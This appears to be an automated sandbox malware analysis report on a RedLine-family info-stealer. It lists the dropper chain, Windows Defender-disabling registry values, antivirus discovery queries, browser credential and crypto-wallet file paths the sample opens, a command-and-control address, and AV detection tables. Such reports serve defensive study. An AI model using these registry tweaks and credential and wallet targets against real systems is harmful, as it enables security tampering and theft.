                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040ADB0 GetProcessHeap,HeapFree,5_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E86F40 SetUnhandledExceptionFilter,0_2_00E86F40
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E86CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C6F40 SetUnhandledExceptionFilter,1_2_000C6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_000C6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F6F40 SetUnhandledExceptionFilter,2_2_001F6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_001F6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE6F40 SetUnhandledExceptionFilter,3_2_00DE6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00DE6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E817EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00E817EE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: GetLocaleInfoA,5_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E87155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00E87155
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeCode function: 4_2_00007FF815F0077D GetUserNameA,4_2_00007FF815F0077D
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E82BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00E82BFB

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: kGO12fD60.exe, 00000005.00000002.408292367.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000003.401568013.0000000005BD5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kGO12fD60.exe PID: 6048, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPED
                    Source: kGO12fD60.exe, 00000005.00000002.408389160.0000000005C0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: kGO12fD60.exe, 00000005.00000002.408389160.0000000005C0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: kGO12fD60.exeString found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: kGO12fD60.exe PID: 6048, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kGO12fD60.exe PID: 6048, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPED
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation
                    1
                    Windows Service
                    2
                    Bypass User Access Control
                    21
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium2
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default Accounts3
                    Native API
                    Boot or Logon Initialization Scripts1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Windows)1
                    Windows Service
                    2
                    Obfuscated Files or Information
                    Security Account Manager1
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Service Execution
                    Logon Script (Mac)1
                    Process Injection
                    21
                    Software Packing
                    NTDS137
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets361
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Bypass User Access Control
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Process Injection
                    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                    Rundll32
                    Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 815872 Sample: iOqzwbUlln.exe Startdate: 27/02/2023 Architecture: WINDOWS Score: 100 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for domain / URL 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 9 other signatures 2->77 9 iOqzwbUlln.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 file4 45 C:\Users\user\AppData\Local\...\szV94FU13.exe, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\rWE40pD80.exe, PE32 9->47 dropped 18 szV94FU13.exe 1 4 9->18         started        process5 file6 37 C:\Users\user\AppData\Local\...\stL82bL52.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Local\...\nAT03lr78.exe, PE32 18->39 dropped 79 Multi AV Scanner detection for dropped file 18->79 81 Machine Learning detection for dropped file 18->81 22 stL82bL52.exe 1 4 18->22         started        signatures7 process8 file9 41 C:\Users\user\AppData\Local\...\sQm37qN82.exe, PE32 22->41 dropped 43 C:\Users\user\AppData\Local\...\mlf76Mf25.exe, PE32 22->43 dropped 83 Multi AV Scanner detection for dropped file 22->83 85 Machine Learning detection for dropped file 22->85 26 sQm37qN82.exe 1 4 22->26         started        signatures10 process11 file12 49 C:\Users\user\AppData\Local\...\kGO12fD60.exe, PE32 26->49 dropped 51 C:\Users\user\AppData\Local\...\iDa05Vg46.exe, PE32 26->51 dropped 87 Multi AV Scanner detection for dropped file 26->87 89 Machine Learning detection for dropped file 26->89 30 kGO12fD60.exe 5 26->30         started        35 iDa05Vg46.exe 9 1 26->35         started        signatures13 process14 dnsIp15 55 193.233.20.23, 4123, 49695 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 30->55 53 C:\Users\user\AppData\...\kGO12fD60.exe.log, ASCII 30->53 dropped 57 Multi AV Scanner detection for dropped file 30->57 59 Detected unpacking (changes PE section rights) 30->59 61 Detected unpacking (overwrites its own PE header) 30->61 69 4 other signatures 30->69 63 Machine Learning detection for dropped file 35->63 65 Disable Windows Defender notifications (registry) 35->65 67 Disable Windows Defender real time protection (registry) 35->67 file16 signatures17

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    iOqzwbUlln.exe67%ReversingLabsByteCode-MSIL.Trojan.RedLine
                    iOqzwbUlln.exe57%VirustotalBrowse
                    iOqzwbUlln.exe100%AviraHEUR/AGEN.1252166
                    iOqzwbUlln.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe100%AviraHEUR/AGEN.1252166
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe74%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe68%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe62%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe54%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe44%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe51%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe59%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe44%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe62%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe76%ReversingLabsByteCode-MSIL.Trojan.Disabler
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe44%ReversingLabsWin32.Trojan.Generic
                    SourceDetectionScannerLabelLinkDownload
                    3.3.sQm37qN82.exe.45a7de1.0.unpack100%AviraTR/Patched.GenDownload File
                    0.0.iOqzwbUlln.exe.e80000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                    2.3.stL82bL52.exe.458de20.0.unpack100%AviraTR/Patched.GenDownload File
                    0.2.iOqzwbUlln.exe.e80000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                    1.3.szV94FU13.exe.443b820.0.unpack100%AviraTR/Patched.GenDownload File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id90%URL Reputationsafe
                    http://tempuri.org/Entity/Id80%URL Reputationsafe
                    http://tempuri.org/Entity/Id50%URL Reputationsafe
                    http://tempuri.org/Entity/Id40%URL Reputationsafe
                    http://tempuri.org/Entity/Id70%URL Reputationsafe
